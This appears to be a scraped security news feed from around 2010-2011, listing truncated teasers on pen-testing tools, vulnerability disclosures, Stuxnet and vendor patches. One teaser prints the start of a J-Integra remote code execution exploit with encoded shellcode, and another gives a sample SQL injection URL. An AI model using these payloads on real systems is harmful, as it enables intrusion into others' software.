GnackTrackR6 Released , available for Download !

GnackTrackR6 Released , available for Download ! GnackTrack is a Live and installable Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME! GnackTrackR6 has ju...

Red Hat Enterprise Linux seunshare Unsafe Implementation

Developers should not rely on the stickiness of /tmp on Red Hat Linux --------------------------------------------------------------------- Recent versions of Red Hat Enterprise Linux and Fedora provide seunshare, a setuid root utility from policycore-utils intended to make new filesystem...

Mac App Store Safeguards Bypassed, Opening Up Pirated Apps

Just a day after Apple introduced its Mac App Store, some users already have found a way around the DRM system designed to ensure that they have paid for the apps that they’re using. The technique seems to work only on apps that don’t correctly implement the method for checking the App Store...

Exploit Kits Employing Obfuscation to Prevent Analysis

The creators of the Phoenix exploit kit have begun using obfuscation and other techniques to prevent security researchers and others from reverse-engineering the installation process for the kit, adopting a tactic that has become increasingly popular among attackers recently. The Phoenix exploit...

Mantra: A Browser based Security Framework !

Mantra is a dream that came true for the author. It is a collection of free and open source tools integrated into a web browser – Firefox, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and...

Android Update Adds Protection From Mobile Clickjacking

Google released the latest version of its Android mobile operating system on Monday, adding security features that it says will make it tougher for mobile device users to be subjected to “clickjacking” attacks that trick them into clicking on hidden or disguised user interface elements. The compa...

Android Update Adds Protections For Mobile Clickjacking

Google released the latest version of its Android mobile operating system on Monday, adding security features that it says will make it tougher for mobile device users to be subjected to “clickjacking” attacks that trick them into clicking on hidden or disguised user interface elements. The compa...

J-Integra 2.11 Remote Code Execution

esp = String100, "B" calc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49" & unescape"%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68" & unescape"%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42" & unescape"%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a" &...

Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability

========================================================= Eclipse IDE | Help Server Local Cross Site Scripting XSS Vulnerability ========================================================= 1. OVERVIEW The Help Content web application of Eclipse IDE was vulnerable to Cross Site Scripting XSS...

Eclipse IDE Cross Site Scripting

========================================================= Eclipse IDE | Help Server Local Cross Site Scripting XSS Vulnerability ========================================================= 1. OVERVIEW The Help Content web application of Eclipse IDE was vulnerable to Cross Site Scripting XSS...

Watcher 1.4.1 - latest version download

"Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as...

[SECURITY] Fedora 12 Update: tomcat6-6.0.26-3.fc12

Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participator...

Popular Facebook Games Exposing User Data to Third Parties

Facebook privacy has been a recurring topic in the news. With the massive number of users on the site, the amount of personal data involved is enormous. Recently, it has been revealed that many popular third-party apps, mainly games like Farmville and Texas HoldEm Poker, are leaking the unique...

The Shellcoder's Handbook : 1st & 2nd Edition Download

Shellcoder's Programming Uncovered Kris Kaspersky ISBN-10: 193176946X Product Description How hackers, viruses, and worms attack computers from the Internet and exploit security holes in software is explained in this outline of antivirus software, patches, and firewalls that try in vain to...

Rethinking Stuxnet

It’s hard to think of a story in the last few years that has generated more hype, conjecture, posturing, hyperbole and misdirection than Stuxnet, with the possible exception of the Aurora attacks. The commentary and hype around Stuxnet has shifted and morphed over the last few months, and now it...

SmarterMail 7.x Cross Site Scripting

Source URL http://cloudscan.blogspot.com/2010/10/vendor-smartertoolscom-smartermail-7x.html Vendor: smartertools.com SmarterMail 7.x 7.2.3925 Date: 2010-10-01 Author : David Hoyt sqlhacker – Hoyt LLC Contact : [email protected] Home : http://cloudscan.me Dork : insite: SmarterMail Enterprise 7.1 B...

CMS Mysite Cross Site Scripting / SQL Injection

Hello Full-Disclosure! I want to warn you about Full path disclosure, Cross-Site Scripting and SQL Injection vulnerabilities in CMS MYsite. It's Ukrainian commercial CMS. Full path disclosure WASC-13: http://site/portal/modules.php?name=Ads XSS WASC-08:...

openSUSE Security Update : MozillaFirefox (openSUSE-SU-2010:0632-1)

Mozilla Firefox was updated to version 3.6.10, fixing various bugs and security issues. Following security issues were fixed: MFSA 2010-49 / CVE-2010-3169: Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. So...

CMS WebManager-Pro SQL Injection

Hello Bugtraq! I want to warn you about SQL Injection and Redirector URL Redirector Abuse vulnerabilities in CMS WebManager-Pro SecurityVulns ID:11108. It's Ukrainian commercial CMS. SQL Injection: http://site/c.php?id=1%20and%20version=5 Redirector:...

sudo is decorated with global decorator

The reasoning behind preventing theme developers from theming the admin areas was because if you don't know what you are doing then you can mess things up to such an extent that you are unable to use confluence. By decorating the sudo login pages using the global decorator it exposes the user to...